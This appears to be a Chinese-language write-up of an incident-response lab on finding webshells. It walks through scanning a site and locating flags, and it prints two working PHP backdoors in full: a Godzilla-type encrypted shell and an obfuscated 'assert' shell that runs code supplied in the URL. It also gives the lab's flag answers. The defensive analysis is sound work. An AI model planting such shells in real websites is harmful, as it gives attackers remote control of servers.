第一章-应急响应Webshell查杀

N1Rvana included in 应急响应

2024-01-31 About 200 words One minute - views

任务要求
1.黑客webshell里面的flag flag{xxxxx-xxxx-xxxx-xxxx-xxxx}
2.黑客使用的什么工具的shell github地址的md5 flag{md5}
3.黑客隐藏shell的完整路径的md5 flag{md5} 注 : /xxx/xxx/xxx/xxx/xxx.xxx
4.黑客免杀马完整路径 md5 flag{md5}
连上靶机之后，利用tar命令，压缩网站源码
tar -zcvf html.tar.gz /var/www/html
在线查杀网站进行查杀

在/var/www/html/include/gz.php文件下，发现第一个flag

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32


root@ip-10-0-10-3:/var/www/html# cat /var/www/html/include/gz.php  
<?php  
@session_start();  
@set_time_limit(0);  
@error_reporting(0);  
function encode($D,$K){  
    for($i=0;$i<strlen($D);$i++) {  
        $c = $K[$i+1&15];  
        $D[$i] = $D[$i]^$c;  
    }  
    return $D;  
}  
//027ccd04-5065-48b6-a32d-77c704a5e26d  
$payloadName='payload';  
$key='3c6e0b8a9c15224a';  
$data=file_get_contents("php://input");  
if ($data!==false){  
    $data=encode($data,$key);  
    if (isset($_SESSION[$payloadName])){  
        $payload=encode($_SESSION[$payloadName],$key);  
        if (strpos($payload,"getBasicsInfo")===false){  
            $payload=encode($payload,$key);  
        }  
                eval($payload);  
        echo encode(@run($data),$key);  
    }else{  
        if (strpos($data,"getBasicsInfo")!==false){  
            $_SESSION[$payloadName]=encode($data,$key);  
        }  
    }  
}  
  

flag{027ccd04-5065-48b6-a32d-77c704a5e26d}
很明显是一个冰蝎马，找到 github地址进行提交

1
2
3


f10wers13eicheng@MacBookPro [21时41分00秒] [~/Desktop]   
-> % md5 -s 'https://github.com/BeichenDream/Godzilla'  
MD5 ("https://github.com/BeichenDream/Godzilla") = 39392de3218c333f794befef07ac9257  

flag{39392de3218c333f794befef07ac9257}
第三个 flag 是隐藏shell文件的路径/var/www/html/include/Db/.Mysqli.php

1
2
3


f10wers13eicheng@MacBookPro [21时39分52秒] [~/Desktop]   
-> % md5 -s '/var/www/html/include/Db/.Mysqli.php'    
MD5 ("/var/www/html/include/Db/.Mysqli.php") = aebac0e58cd6c5fad1695ee4d1ac1919  

第四个 flag 为免杀马的路径，在河马查杀里边可以注意到一个特殊的
机器学习检测为webshell，进行查看

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14


root@ip-10-0-10-3:/var/www/html# cat /var/www/html/wap/top.php  
<?php  
  
$key = "password";  
  
//ERsDHgEUC1hI  
$fun = base64_decode($_GET['func']);  
for($i=0;$i<strlen($fun);$i++){  
    $fun[$i] = $fun[$i]^$key[$i+1&7];  
}  
$a = "a";  
$s = "s";  
$c=$a.$s.$_GET["func2"];  
$c($fun);  

确实是免杀马

1
2
3


f10wers13eicheng@MacBookPro [21时39分59秒] [~/Desktop]   
-> % md5 -s '/var/www/html/wap/top.php'             
MD5 ("/var/www/html/wap/top.php") = eeff2eabfd9b7a6d26fc1a53d3f7d1de  

flag{eeff2eabfd9b7a6d26fc1a53d3f7d1de}